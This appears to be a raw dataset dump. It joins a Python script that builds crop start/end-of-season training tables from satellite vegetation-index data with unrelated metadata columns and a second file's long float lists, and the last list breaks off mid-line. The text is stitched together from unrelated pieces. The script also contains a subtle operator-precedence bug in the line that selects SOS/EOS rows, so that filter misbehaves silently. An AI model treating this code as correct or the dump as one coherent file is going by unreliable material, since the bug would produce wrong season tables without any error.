#### last update Nov. 29, 2021
####
"""
Build SOS/EOS (start/end-of-season) training tables for one county.

The identical detection pipeline runs twice, writing one CSV per pass:
  a. three filters: irrigated fields, NASS out, survey date correct
  b. one filter:    irrigated fields
The shared work is factored into run_pass(); the passes are still
sequential (they could be parallelized, as the original note said).

Usage: python 03_d_train_tables_JFD.py <county> <index> <SEOS_cut>
"""
import csv
import numpy as np
import pandas as pd
import datetime
import time
import os, os.path
import sys

start_time = time.time()

# search path for modules
# look @ https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
sys.path.append('/home/hnoorazar/NASA/')
import NASA_core as nc
import NASA_plot_core as ncp

####################################################################################
###
###      Parameters
###
####################################################################################
county = sys.argv[1]    # e.g. "Monterey2014", or "<name><last survey year>"
indeks = sys.argv[2]    # vegetation-index column name in the SG tables
SEOS_cut = sys.argv[3]  # White onset/offset threshold digits: 3, 4, 5, 35


def seos_cut_to_fraction(seos_cut):
    """Convert the SEOS_cut CLI digits to a fraction: '3' -> 0.3, '35' -> 0.35.

    Raises ValueError for any other width; the original code silently left
    the threshold undefined in that case and died later with a NameError.
    """
    if len(seos_cut) == 1:
        return int(seos_cut) / 10.0
    if len(seos_cut) == 2:
        return int(seos_cut) / 100.0
    raise ValueError("SEOS_cut must be 1 or 2 digits, got {!r}.".format(seos_cut))


onset_cut = seos_cut_to_fraction(SEOS_cut)
offset_cut = onset_cut  # same threshold for season onset and offset
print("SEOS_cut is {}.".format(SEOS_cut))
print("onset_cut is {} and offset_cut is {}.".format(onset_cut, offset_cut))

####################################################################################
###
###      Aeolus Directories
###
####################################################################################
SF_data_dir = "/data/hydro/users/Hossein/NASA/000_shapefile_data_part/"
data_dir = "/data/hydro/users/Hossein/NASA/05_SG_TS/"
SOS_table_dir = "/data/hydro/users/Hossein/NASA/06_SOS_tables/"
output_dir = SOS_table_dir
os.makedirs(output_dir, exist_ok=True)

HR = "_________________________________________________________"
print(HR)
print("data dir is: " + data_dir)
print(HR)
print("output_dir is: " + output_dir)
print(HR)


def load_smoothed_TS(county, indeks):
    """Read the smoothed (SG) vegetation-index time series for the county."""
    SG_df = pd.read_csv(data_dir + "SG_" + county + "_" + indeks + "_JFD.csv")
    SG_df['human_system_start_time'] = pd.to_datetime(SG_df['human_system_start_time'])
    # Monterays ID will be read as integer, convert to string
    SG_df["ID"] = SG_df["ID"].astype(str)
    return SG_df


def load_shapefile_data(county):
    """Read per-field attributes and normalize the crop-type column."""
    SF_data = pd.read_csv(SF_data_dir + county + ".csv")
    SF_data["ID"] = SF_data["ID"].astype(str)
    # Monterey 2014 keeps its crop type in a differently named column.
    crop_col = 'Crop2014' if county == "Monterey2014" else 'CropTyp'
    SF_data[crop_col] = (SF_data[crop_col].str.lower()
                                          .str.replace(" ", "_")
                                          .str.replace(",", "")
                                          .str.replace("/", "_"))
    return SF_data


def apply_filters(SF_data, county, full_filters):
    """Keep irrigated fields; with full_filters also drop wrong-survey-year
    and NASS fields. Monterey2014 is passed through untouched (its table
    lacks these columns -- presumed; confirm against the shapefile export).
    """
    if county == "Monterey2014":
        return SF_data
    if full_filters:
        # filter by last survey date. Last 4 digits of county name!
        print("No. of fields in SF_data is {}.".format(len(SF_data.ID.unique())))
        SF_data = nc.filter_by_lastSurvey(SF_data, year=county[-4:])
        print("No. of fields in SF_data after survey year is {}.".format(len(SF_data.ID.unique())))
        SF_data = nc.filter_out_NASS(SF_data)  # Toss NASS
        print("No. of fields in SF_data after NASS is {}.".format(len(SF_data.ID.unique())))
    SF_data = nc.filter_out_nonIrrigated(SF_data)  # keep only irrigated lands
    print("No. of fields in SF_data after Irrigation is {}.".format(len(SF_data.ID.unique())))
    return SF_data


def detect_SEOS(SG_df, indeks, onset_cut, offset_cut):
    """Run White's SOS/EOS detection per field per year; return the table."""
    polygon_list = SG_df['ID'].unique()
    print(HR)
    print("polygon_list is of length {}.".format(len(polygon_list)))

    ratio_name = indeks + "_ratio"
    SEOS_output_columns = ['ID', 'human_system_start_time', indeks,
                           ratio_name, 'SOS', 'EOS', 'season_count']
    # 4 rows per observation leaves room for double-cropping
    # (at least 2 SOS and 2 EOS rows per field-year).
    min_year = SG_df.human_system_start_time.dt.year.min()
    max_year = SG_df.human_system_start_time.dt.year.max()
    no_years = max_year - min_year + 1
    all_poly_and_SEOS = pd.DataFrame(data=None,
                                     index=np.arange(4 * no_years * len(SG_df)),
                                     columns=SEOS_output_columns)
    counter = 0
    pointer_SEOS_tab = 0
    # Re-order columns of the read data table to match the output columns.
    SG_df = SG_df[SEOS_output_columns[0:3]]

    for a_poly in polygon_list:
        if counter % 1000 == 0:
            print(HR)
            print("counter: " + str(counter))
            print(a_poly)
        curr_field = SG_df[SG_df['ID'] == a_poly].copy()
        curr_field.sort_values(by=['human_system_start_time'], inplace=True)
        curr_field.reset_index(drop=True, inplace=True)
        unique_years = curr_field['human_system_start_time'].dt.year.unique()
        # detect SOS and EOS in each year
        for yr in unique_years:
            curr_field_yr = curr_field[curr_field['human_system_start_time'].dt.year == yr].copy()
            # May-October index range; a small range flags orchards/evergreens.
            # NOTE(review): assumes at least one May-Oct observation per
            # field-year, otherwise max()/min() raise -- confirm upstream.
            y_orchard = curr_field_yr[curr_field_yr['human_system_start_time'].dt.month >= 5]
            y_orchard = y_orchard[y_orchard['human_system_start_time'].dt.month <= 10]
            y_orchard_range = max(y_orchard[indeks]) - min(y_orchard[indeks])
            if y_orchard_range > 0.3:
                # find SOS and EOS, and add them to the table
                curr_field_yr = nc.addToDF_SOS_EOS_White(pd_TS=curr_field_yr,
                                                         VegIdx=indeks,
                                                         onset_thresh=onset_cut,
                                                         offset_thresh=offset_cut)
                # Kill false detected seasons
                curr_field_yr = nc.Null_SOS_EOS_by_DoYDiff(pd_TS=curr_field_yr,
                                                           min_season_length=40)
                # extract the SOS and EOS rows
                SEOS = curr_field_yr[(curr_field_yr['SOS'] != 0) | curr_field_yr['EOS'] != 0]
                SEOS = SEOS.copy()
                SOS_tb = curr_field_yr[curr_field_yr['SOS'] != 0]
                if len(SOS_tb) >= 2:
                    SEOS["season_count"] = len(SOS_tb)
                    # re-order columns of SEOS so they match
                    SEOS = SEOS[all_poly_and_SEOS.columns]
                    all_poly_and_SEOS[pointer_SEOS_tab:(pointer_SEOS_tab + len(SEOS))] = SEOS.values
                    pointer_SEOS_tab += len(SEOS)
                else:
                    # single (or no) detected season: keep one row
                    curr_field_yr["season_count"] = 1
                    curr_field_yr = curr_field_yr[all_poly_and_SEOS.columns]
                    row = curr_field_yr.iloc[0].values.reshape(1, len(curr_field_yr.iloc[0]))
                    all_poly_and_SEOS.iloc[pointer_SEOS_tab:(pointer_SEOS_tab + 1)] = row
                    pointer_SEOS_tab += 1
            else:
                # Potentially apples, cherries, etc. -- the ratio/SOS/EOS
                # columns were never computed, so 666 is used as a proxy.
                row = np.append(curr_field_yr.iloc[0], [666, 666, 666, 1])
                row = row.reshape(1, len(row))
                all_poly_and_SEOS.iloc[pointer_SEOS_tab:(pointer_SEOS_tab + 1)] = row
                pointer_SEOS_tab += 1
        counter += 1

    # drop the unused pre-allocated rows
    all_poly_and_SEOS.dropna(inplace=True)
    return all_poly_and_SEOS


def run_pass(full_filters, out_suffix):
    """One end-to-end pass: load, filter, detect seasons, write the CSV."""
    SG_df = load_smoothed_TS(county, indeks)
    SF_data = load_shapefile_data(county)
    SF_data = apply_filters(SF_data, county, full_filters)
    kept_ids = list(SF_data.ID)
    SG_df = SG_df[SG_df.ID.isin(kept_ids)]
    SG_df = pd.merge(SG_df, SF_data, on=['ID'], how='left')
    print("columns of SG_df right after merging is: ")
    print(SG_df.head(2))
    SG_df.reset_index(drop=True, inplace=True)
    SG_df = nc.initial_clean(df=SG_df, column_to_be_cleaned=indeks)
    table = detect_SEOS(SG_df, indeks, onset_cut, offset_cut)
    out_name = output_dir + "SC_train_" + county + "_" + indeks + str(SEOS_cut) + out_suffix
    table.to_csv(out_name, index=False)


# Pass (a): survey-date correct, NASS out, irrigated only.
run_pass(full_filters=True, out_suffix="_irr_NoNASS_SurvCorrect_JFD.csv")
# Pass (b): irrigated only.
run_pass(full_filters=False, out_suffix="_irrOneFilter_JFD.csv")

print("done")
end_time = time.time()
print("it took {:.0f} minutes to run this code.".format((end_time - start_time) / 60))
| 40.588378
| 122
| 0.549365
| 2,088
| 16,763
| 3.943487
| 0.146552
| 0.054651
| 0.048093
| 0.053437
| 0.831066
| 0.826694
| 0.823294
| 0.812728
| 0.805927
| 0.805927
| 0
| 0.016764
| 0.220665
| 16,763
| 412
| 123
| 40.686893
| 0.613518
| 0.166975
| 0
| 0.805128
| 0
| 0
| 0.167644
| 0.089776
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046154
| 0
| 0.046154
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7f2582c50c9e73df02f02acbc4b27eda559f68e
| 84,740
|
py
|
Python
|
mysite/patterns/56.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 19
|
2016-06-17T23:36:27.000Z
|
2020-01-13T16:41:55.000Z
|
mysite/patterns/56.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 13
|
2016-06-06T12:57:05.000Z
|
2019-02-05T02:21:00.000Z
|
patterns/56.py
|
OmnesRes/GRIMMER
|
173c99ebdb6a9edb1242d24a791d0c5d778ff643
|
[
"MIT"
] | 7
|
2017-03-28T18:12:22.000Z
|
2021-06-16T09:32:59.000Z
|
pattern_zero=[0.0, 0.017538265306, 0.03443877551, 0.035714285714, 0.050701530612, 0.05325255102, 0.066326530612, 0.070153061224, 0.071428571429, 0.08131377551, 0.086415816327, 0.088966836735, 0.095663265306, 0.102040816327, 0.105867346939, 0.107142857143, 0.109375, 0.117028061224, 0.122130102041, 0.122448979592, 0.124681122449, 0.13137755102, 0.134885204082, 0.137755102041, 0.141581632653, 0.142857142857, 0.145089285714, 0.146683673469, 0.152742346939, 0.157844387755, 0.158163265306, 0.160395408163, 0.167091836735, 0.168367346939, 0.170599489796, 0.173469387755, 0.177295918367, 0.17825255102, 0.178571428571, 0.180803571429, 0.182397959184, 0.1875, 0.188456632653, 0.193558673469, 0.19387755102, 0.196109693878, 0.202806122449, 0.204081632653, 0.20631377551, 0.209183673469, 0.211415816327, 0.213010204082, 0.213966836735, 0.214285714286, 0.216517857143, 0.218112244898, 0.223214285714, 0.224170918367, 0.229272959184, 0.229591836735, 0.231823979592, 0.234375, 0.238520408163, 0.239795918367, 0.242028061224, 0.244897959184, 0.247130102041, 0.248724489796, 0.249681122449, 0.25, 0.252232142857, 0.253826530612, 0.258928571429, 0.259885204082, 0.264987244898, 0.265306122449, 0.267538265306, 0.270089285714, 0.274234693878, 0.275510204082, 0.277742346939, 0.280612244898, 0.282844387755, 0.28443877551, 0.285395408163, 0.285714285714, 0.287946428571, 0.289540816327, 0.294642857143, 0.295599489796, 0.300701530612, 0.301020408163, 0.30325255102, 0.305803571429, 0.309948979592, 0.311224489796, 0.313456632653, 0.316326530612, 0.318558673469, 0.320153061224, 0.321109693878, 0.321428571429, 0.323660714286, 0.325255102041, 0.330357142857, 0.33131377551, 0.336415816327, 0.336734693878, 0.338966836735, 0.341517857143, 0.345663265306, 0.34693877551, 0.349170918367, 0.352040816327, 0.354272959184, 0.355867346939, 0.356823979592, 0.357142857143, 0.359375, 0.360969387755, 0.366071428571, 0.367028061224, 0.372130102041, 0.372448979592, 0.374681122449, 0.377232142857, 0.38137755102, 
0.382653061224, 0.384885204082, 0.387755102041, 0.389987244898, 0.391581632653, 0.392538265306, 0.392857142857, 0.395089285714, 0.396683673469, 0.401785714286, 0.402742346939, 0.407844387755, 0.408163265306, 0.410395408163, 0.412946428571, 0.417091836735, 0.418367346939, 0.420599489796, 0.423469387755, 0.425701530612, 0.427295918367, 0.42825255102, 0.428571428571, 0.430803571429, 0.432397959184, 0.4375, 0.438456632653, 0.443558673469, 0.44387755102, 0.446109693878, 0.448660714286, 0.452806122449, 0.454081632653, 0.45631377551, 0.459183673469, 0.461415816327, 0.463010204082, 0.463966836735, 0.464285714286, 0.466517857143, 0.468112244898, 0.473214285714, 0.474170918367, 0.479272959184, 0.479591836735, 0.481823979592, 0.484375, 0.488520408163, 0.489795918367, 0.492028061224, 0.494897959184, 0.497130102041, 0.498724489796, 0.499681122449, 0.5, 0.502232142857, 0.503826530612, 0.508928571429, 0.509885204082, 0.514987244898, 0.515306122449, 0.517538265306, 0.520089285714, 0.524234693878, 0.525510204082, 0.527742346939, 0.530612244898, 0.532844387755, 0.53443877551, 0.535395408163, 0.535714285714, 0.537946428571, 0.539540816327, 0.544642857143, 0.545599489796, 0.550701530612, 0.551020408163, 0.55325255102, 0.555803571429, 0.559948979592, 0.561224489796, 0.563456632653, 0.566326530612, 0.568558673469, 0.570153061224, 0.571109693878, 0.571428571429, 0.573660714286, 0.575255102041, 0.580357142857, 0.58131377551, 0.586415816327, 0.586734693878, 0.588966836735, 0.591517857143, 0.595663265306, 0.59693877551, 0.599170918367, 0.602040816327, 0.604272959184, 0.605867346939, 0.606823979592, 0.607142857143, 0.609375, 0.610969387755, 0.616071428571, 0.617028061224, 0.622130102041, 0.622448979592, 0.624681122449, 0.627232142857, 0.63137755102, 0.632653061224, 0.634885204082, 0.637755102041, 0.639987244898, 0.641581632653, 0.642538265306, 0.642857142857, 0.645089285714, 0.646683673469, 0.651785714286, 0.652742346939, 0.657844387755, 0.658163265306, 0.660395408163, 0.662946428571, 
0.667091836735, 0.668367346939, 0.670599489796, 0.673469387755, 0.675701530612, 0.677295918367, 0.67825255102, 0.678571428571, 0.680803571429, 0.682397959184, 0.6875, 0.688456632653, 0.693558673469, 0.69387755102, 0.696109693878, 0.698660714286, 0.702806122449, 0.704081632653, 0.70631377551, 0.709183673469, 0.711415816327, 0.713010204082, 0.713966836735, 0.714285714286, 0.716517857143, 0.718112244898, 0.723214285714, 0.724170918367, 0.729272959184, 0.729591836735, 0.731823979592, 0.734375, 0.738520408163, 0.739795918367, 0.742028061224, 0.744897959184, 0.747130102041, 0.748724489796, 0.749681122449, 0.75, 0.752232142857, 0.753826530612, 0.758928571429, 0.759885204082, 0.764987244898, 0.765306122449, 0.767538265306, 0.770089285714, 0.774234693878, 0.775510204082, 0.777742346939, 0.780612244898, 0.782844387755, 0.78443877551, 0.785395408163, 0.785714285714, 0.787946428571, 0.789540816327, 0.794642857143, 0.795599489796, 0.800701530612, 0.801020408163, 0.80325255102, 0.805803571429, 0.809948979592, 0.811224489796, 0.813456632653, 0.816326530612, 0.818558673469, 0.820153061224, 0.821109693878, 0.821428571429, 0.823660714286, 0.825255102041, 0.830357142857, 0.83131377551, 0.836415816327, 0.836734693878, 0.838966836735, 0.841517857143, 0.845663265306, 0.84693877551, 0.849170918367, 0.852040816327, 0.854272959184, 0.855867346939, 0.856823979592, 0.857142857143, 0.859375, 0.860969387755, 0.866071428571, 0.867028061224, 0.872130102041, 0.872448979592, 0.874681122449, 0.877232142857, 0.88137755102, 0.882653061224, 0.884885204082, 0.887755102041, 0.889987244898, 0.891581632653, 0.892538265306, 0.892857142857, 0.895089285714, 0.896683673469, 0.901785714286, 0.902742346939, 0.907844387755, 0.908163265306, 0.910395408163, 0.912946428571, 0.917091836735, 0.918367346939, 0.920599489796, 0.923469387755, 0.925701530612, 0.927295918367, 0.92825255102, 0.928571428571, 0.930803571429, 0.932397959184, 0.9375, 0.938456632653, 0.943558673469, 0.94387755102, 0.946109693878, 0.948660714286, 
0.952806122449, 0.954081632653, 0.95631377551, 0.959183673469, 0.961415816327, 0.963010204082, 0.963966836735, 0.964285714286, 0.966517857143, 0.968112244898, 0.973214285714, 0.974170918367, 0.979272959184, 0.979591836735, 0.981823979592, 0.984375, 0.988520408163, 0.989795918367, 0.992028061224, 0.994897959184, 0.997130102041, 0.998724489796, 0.999681122449]
pattern_odd=[0.0, 0.002232142857, 0.003826530612, 0.008928571429, 0.009885204082, 0.014987244898, 0.015306122449, 0.017538265306, 0.020089285714, 0.024234693878, 0.025510204082, 0.027742346939, 0.030612244898, 0.032844387755, 0.03443877551, 0.035395408163, 0.035714285714, 0.037946428571, 0.039540816327, 0.044642857143, 0.045599489796, 0.050701530612, 0.051020408163, 0.05325255102, 0.055803571429, 0.059948979592, 0.061224489796, 0.063456632653, 0.066326530612, 0.068558673469, 0.070153061224, 0.071109693878, 0.071428571429, 0.073660714286, 0.075255102041, 0.080357142857, 0.08131377551, 0.086415816327, 0.086734693878, 0.088966836735, 0.091517857143, 0.095663265306, 0.09693877551, 0.099170918367, 0.102040816327, 0.104272959184, 0.105867346939, 0.106823979592, 0.107142857143, 0.109375, 0.110969387755, 0.116071428571, 0.117028061224, 0.122130102041, 0.122448979592, 0.124681122449, 0.127232142857, 0.13137755102, 0.132653061224, 0.134885204082, 0.137755102041, 0.139987244898, 0.141581632653, 0.142538265306, 0.142857142857, 0.145089285714, 0.146683673469, 0.151785714286, 0.152742346939, 0.157844387755, 0.158163265306, 0.160395408163, 0.162946428571, 0.167091836735, 0.168367346939, 0.170599489796, 0.173469387755, 0.175701530612, 0.177295918367, 0.17825255102, 0.178571428571, 0.180803571429, 0.182397959184, 0.1875, 0.188456632653, 0.193558673469, 0.19387755102, 0.196109693878, 0.198660714286, 0.202806122449, 0.204081632653, 0.20631377551, 0.209183673469, 0.211415816327, 0.213010204082, 0.213966836735, 0.214285714286, 0.216517857143, 0.218112244898, 0.223214285714, 0.224170918367, 0.229272959184, 0.229591836735, 0.231823979592, 0.234375, 0.238520408163, 0.239795918367, 0.242028061224, 0.244897959184, 0.247130102041, 0.248724489796, 0.249681122449, 0.25, 0.252232142857, 0.253826530612, 0.258928571429, 0.259885204082, 0.264987244898, 0.265306122449, 0.267538265306, 0.270089285714, 0.274234693878, 0.275510204082, 0.277742346939, 0.280612244898, 0.282844387755, 0.28443877551, 
0.285395408163, 0.285714285714, 0.287946428571, 0.289540816327, 0.294642857143, 0.295599489796, 0.300701530612, 0.301020408163, 0.30325255102, 0.305803571429, 0.309948979592, 0.311224489796, 0.313456632653, 0.316326530612, 0.318558673469, 0.320153061224, 0.321109693878, 0.321428571429, 0.323660714286, 0.325255102041, 0.330357142857, 0.33131377551, 0.336415816327, 0.336734693878, 0.338966836735, 0.341517857143, 0.345663265306, 0.34693877551, 0.349170918367, 0.352040816327, 0.354272959184, 0.355867346939, 0.356823979592, 0.357142857143, 0.359375, 0.360969387755, 0.366071428571, 0.367028061224, 0.372130102041, 0.372448979592, 0.374681122449, 0.377232142857, 0.38137755102, 0.382653061224, 0.384885204082, 0.387755102041, 0.389987244898, 0.391581632653, 0.392538265306, 0.392857142857, 0.395089285714, 0.396683673469, 0.401785714286, 0.402742346939, 0.407844387755, 0.408163265306, 0.410395408163, 0.412946428571, 0.417091836735, 0.418367346939, 0.420599489796, 0.423469387755, 0.425701530612, 0.427295918367, 0.42825255102, 0.428571428571, 0.430803571429, 0.432397959184, 0.4375, 0.438456632653, 0.443558673469, 0.44387755102, 0.446109693878, 0.448660714286, 0.452806122449, 0.454081632653, 0.45631377551, 0.459183673469, 0.461415816327, 0.463010204082, 0.463966836735, 0.464285714286, 0.466517857143, 0.468112244898, 0.473214285714, 0.474170918367, 0.479272959184, 0.479591836735, 0.481823979592, 0.484375, 0.488520408163, 0.489795918367, 0.492028061224, 0.494897959184, 0.497130102041, 0.498724489796, 0.499681122449, 0.5, 0.502232142857, 0.503826530612, 0.508928571429, 0.509885204082, 0.514987244898, 0.515306122449, 0.517538265306, 0.520089285714, 0.524234693878, 0.525510204082, 0.527742346939, 0.530612244898, 0.532844387755, 0.53443877551, 0.535395408163, 0.535714285714, 0.537946428571, 0.539540816327, 0.544642857143, 0.545599489796, 0.550701530612, 0.551020408163, 0.55325255102, 0.555803571429, 0.559948979592, 0.561224489796, 0.563456632653, 0.566326530612, 0.568558673469, 
0.570153061224, 0.571109693878, 0.571428571429, 0.573660714286, 0.575255102041, 0.580357142857, 0.58131377551, 0.586415816327, 0.586734693878, 0.588966836735, 0.591517857143, 0.595663265306, 0.59693877551, 0.599170918367, 0.602040816327, 0.604272959184, 0.605867346939, 0.606823979592, 0.607142857143, 0.609375, 0.610969387755, 0.616071428571, 0.617028061224, 0.622130102041, 0.622448979592, 0.624681122449, 0.627232142857, 0.63137755102, 0.632653061224, 0.634885204082, 0.637755102041, 0.639987244898, 0.641581632653, 0.642538265306, 0.642857142857, 0.645089285714, 0.646683673469, 0.651785714286, 0.652742346939, 0.657844387755, 0.658163265306, 0.660395408163, 0.662946428571, 0.667091836735, 0.668367346939, 0.670599489796, 0.673469387755, 0.675701530612, 0.677295918367, 0.67825255102, 0.678571428571, 0.680803571429, 0.682397959184, 0.6875, 0.688456632653, 0.693558673469, 0.69387755102, 0.696109693878, 0.698660714286, 0.702806122449, 0.704081632653, 0.70631377551, 0.709183673469, 0.711415816327, 0.713010204082, 0.713966836735, 0.714285714286, 0.716517857143, 0.718112244898, 0.723214285714, 0.724170918367, 0.729272959184, 0.729591836735, 0.731823979592, 0.734375, 0.738520408163, 0.739795918367, 0.742028061224, 0.744897959184, 0.747130102041, 0.748724489796, 0.749681122449, 0.75, 0.752232142857, 0.753826530612, 0.758928571429, 0.759885204082, 0.764987244898, 0.765306122449, 0.767538265306, 0.770089285714, 0.774234693878, 0.775510204082, 0.777742346939, 0.780612244898, 0.782844387755, 0.78443877551, 0.785395408163, 0.785714285714, 0.787946428571, 0.789540816327, 0.794642857143, 0.795599489796, 0.800701530612, 0.801020408163, 0.80325255102, 0.805803571429, 0.809948979592, 0.811224489796, 0.813456632653, 0.816326530612, 0.818558673469, 0.820153061224, 0.821109693878, 0.821428571429, 0.823660714286, 0.825255102041, 0.830357142857, 0.83131377551, 0.836415816327, 0.836734693878, 0.838966836735, 0.841517857143, 0.845663265306, 0.84693877551, 0.849170918367, 0.852040816327, 
0.854272959184, 0.855867346939, 0.856823979592, 0.857142857143, 0.859375, 0.860969387755, 0.866071428571, 0.867028061224, 0.872130102041, 0.872448979592, 0.874681122449, 0.877232142857, 0.88137755102, 0.882653061224, 0.884885204082, 0.887755102041, 0.889987244898, 0.891581632653, 0.892538265306, 0.892857142857, 0.895089285714, 0.896683673469, 0.901785714286, 0.902742346939, 0.907844387755, 0.908163265306, 0.910395408163, 0.912946428571, 0.917091836735, 0.918367346939, 0.920599489796, 0.923469387755, 0.925701530612, 0.927295918367, 0.92825255102, 0.928571428571, 0.930803571429, 0.932397959184, 0.9375, 0.938456632653, 0.943558673469, 0.94387755102, 0.946109693878, 0.948660714286, 0.952806122449, 0.954081632653, 0.95631377551, 0.959183673469, 0.961415816327, 0.963010204082, 0.963966836735, 0.964285714286, 0.966517857143, 0.968112244898, 0.973214285714, 0.974170918367, 0.979272959184, 0.979591836735, 0.981823979592, 0.984375, 0.988520408163, 0.989795918367, 0.992028061224, 0.994897959184, 0.997130102041, 0.998724489796, 0.999681122449]
pattern_even=[0.0, 0.002232142857, 0.003826530612, 0.008928571429, 0.009885204082, 0.014987244898, 0.015306122449, 0.017538265306, 0.020089285714, 0.024234693878, 0.025510204082, 0.027742346939, 0.030612244898, 0.032844387755, 0.03443877551, 0.035395408163, 0.035714285714, 0.037946428571, 0.039540816327, 0.044642857143, 0.045599489796, 0.050701530612, 0.051020408163, 0.05325255102, 0.055803571429, 0.059948979592, 0.061224489796, 0.063456632653, 0.066326530612, 0.068558673469, 0.070153061224, 0.071109693878, 0.071428571429, 0.073660714286, 0.075255102041, 0.080357142857, 0.08131377551, 0.086415816327, 0.086734693878, 0.088966836735, 0.091517857143, 0.095663265306, 0.09693877551, 0.099170918367, 0.102040816327, 0.104272959184, 0.105867346939, 0.106823979592, 0.107142857143, 0.109375, 0.110969387755, 0.116071428571, 0.117028061224, 0.122130102041, 0.122448979592, 0.124681122449, 0.127232142857, 0.13137755102, 0.132653061224, 0.134885204082, 0.137755102041, 0.139987244898, 0.141581632653, 0.142538265306, 0.142857142857, 0.145089285714, 0.146683673469, 0.151785714286, 0.152742346939, 0.157844387755, 0.158163265306, 0.160395408163, 0.162946428571, 0.167091836735, 0.168367346939, 0.170599489796, 0.173469387755, 0.175701530612, 0.177295918367, 0.17825255102, 0.178571428571, 0.180803571429, 0.182397959184, 0.1875, 0.188456632653, 0.193558673469, 0.19387755102, 0.196109693878, 0.198660714286, 0.202806122449, 0.204081632653, 0.20631377551, 0.209183673469, 0.211415816327, 0.213010204082, 0.213966836735, 0.214285714286, 0.216517857143, 0.218112244898, 0.223214285714, 0.224170918367, 0.229272959184, 0.229591836735, 0.231823979592, 0.234375, 0.238520408163, 0.239795918367, 0.242028061224, 0.244897959184, 0.247130102041, 0.248724489796, 0.249681122449, 0.25, 0.252232142857, 0.253826530612, 0.258928571429, 0.259885204082, 0.264987244898, 0.265306122449, 0.267538265306, 0.270089285714, 0.274234693878, 0.275510204082, 0.277742346939, 0.280612244898, 0.282844387755, 0.28443877551, 
0.285395408163, 0.285714285714, 0.287946428571, 0.289540816327, 0.294642857143, 0.295599489796, 0.300701530612, 0.301020408163, 0.30325255102, 0.305803571429, 0.309948979592, 0.311224489796, 0.313456632653, 0.316326530612, 0.318558673469, 0.320153061224, 0.321109693878, 0.321428571429, 0.323660714286, 0.325255102041, 0.330357142857, 0.33131377551, 0.336415816327, 0.336734693878, 0.338966836735, 0.341517857143, 0.345663265306, 0.34693877551, 0.349170918367, 0.352040816327, 0.354272959184, 0.355867346939, 0.356823979592, 0.357142857143, 0.359375, 0.360969387755, 0.366071428571, 0.367028061224, 0.372130102041, 0.372448979592, 0.374681122449, 0.377232142857, 0.38137755102, 0.382653061224, 0.384885204082, 0.387755102041, 0.389987244898, 0.391581632653, 0.392538265306, 0.392857142857, 0.395089285714, 0.396683673469, 0.401785714286, 0.402742346939, 0.407844387755, 0.408163265306, 0.410395408163, 0.412946428571, 0.417091836735, 0.418367346939, 0.420599489796, 0.423469387755, 0.425701530612, 0.427295918367, 0.42825255102, 0.428571428571, 0.430803571429, 0.432397959184, 0.4375, 0.438456632653, 0.443558673469, 0.44387755102, 0.446109693878, 0.448660714286, 0.452806122449, 0.454081632653, 0.45631377551, 0.459183673469, 0.461415816327, 0.463010204082, 0.463966836735, 0.464285714286, 0.466517857143, 0.468112244898, 0.473214285714, 0.474170918367, 0.479272959184, 0.479591836735, 0.481823979592, 0.484375, 0.488520408163, 0.489795918367, 0.492028061224, 0.494897959184, 0.497130102041, 0.498724489796, 0.499681122449, 0.5, 0.502232142857, 0.503826530612, 0.508928571429, 0.509885204082, 0.514987244898, 0.515306122449, 0.517538265306, 0.520089285714, 0.524234693878, 0.525510204082, 0.527742346939, 0.530612244898, 0.532844387755, 0.53443877551, 0.535395408163, 0.535714285714, 0.537946428571, 0.539540816327, 0.544642857143, 0.545599489796, 0.550701530612, 0.551020408163, 0.55325255102, 0.555803571429, 0.559948979592, 0.561224489796, 0.563456632653, 0.566326530612, 0.568558673469, 
0.570153061224, 0.571109693878, 0.571428571429, 0.573660714286, 0.575255102041, 0.580357142857, 0.58131377551, 0.586415816327, 0.586734693878, 0.588966836735, 0.591517857143, 0.595663265306, 0.59693877551, 0.599170918367, 0.602040816327, 0.604272959184, 0.605867346939, 0.606823979592, 0.607142857143, 0.609375, 0.610969387755, 0.616071428571, 0.617028061224, 0.622130102041, 0.622448979592, 0.624681122449, 0.627232142857, 0.63137755102, 0.632653061224, 0.634885204082, 0.637755102041, 0.639987244898, 0.641581632653, 0.642538265306, 0.642857142857, 0.645089285714, 0.646683673469, 0.651785714286, 0.652742346939, 0.657844387755, 0.658163265306, 0.660395408163, 0.662946428571, 0.667091836735, 0.668367346939, 0.670599489796, 0.673469387755, 0.675701530612, 0.677295918367, 0.67825255102, 0.678571428571, 0.680803571429, 0.682397959184, 0.6875, 0.688456632653, 0.693558673469, 0.69387755102, 0.696109693878, 0.698660714286, 0.702806122449, 0.704081632653, 0.70631377551, 0.709183673469, 0.711415816327, 0.713010204082, 0.713966836735, 0.714285714286, 0.716517857143, 0.718112244898, 0.723214285714, 0.724170918367, 0.729272959184, 0.729591836735, 0.731823979592, 0.734375, 0.738520408163, 0.739795918367, 0.742028061224, 0.744897959184, 0.747130102041, 0.748724489796, 0.749681122449, 0.75, 0.752232142857, 0.753826530612, 0.758928571429, 0.759885204082, 0.764987244898, 0.765306122449, 0.767538265306, 0.770089285714, 0.774234693878, 0.775510204082, 0.777742346939, 0.780612244898, 0.782844387755, 0.78443877551, 0.785395408163, 0.785714285714, 0.787946428571, 0.789540816327, 0.794642857143, 0.795599489796, 0.800701530612, 0.801020408163, 0.80325255102, 0.805803571429, 0.809948979592, 0.811224489796, 0.813456632653, 0.816326530612, 0.818558673469, 0.820153061224, 0.821109693878, 0.821428571429, 0.823660714286, 0.825255102041, 0.830357142857, 0.83131377551, 0.836415816327, 0.836734693878, 0.838966836735, 0.841517857143, 0.845663265306, 0.84693877551, 0.849170918367, 0.852040816327, 
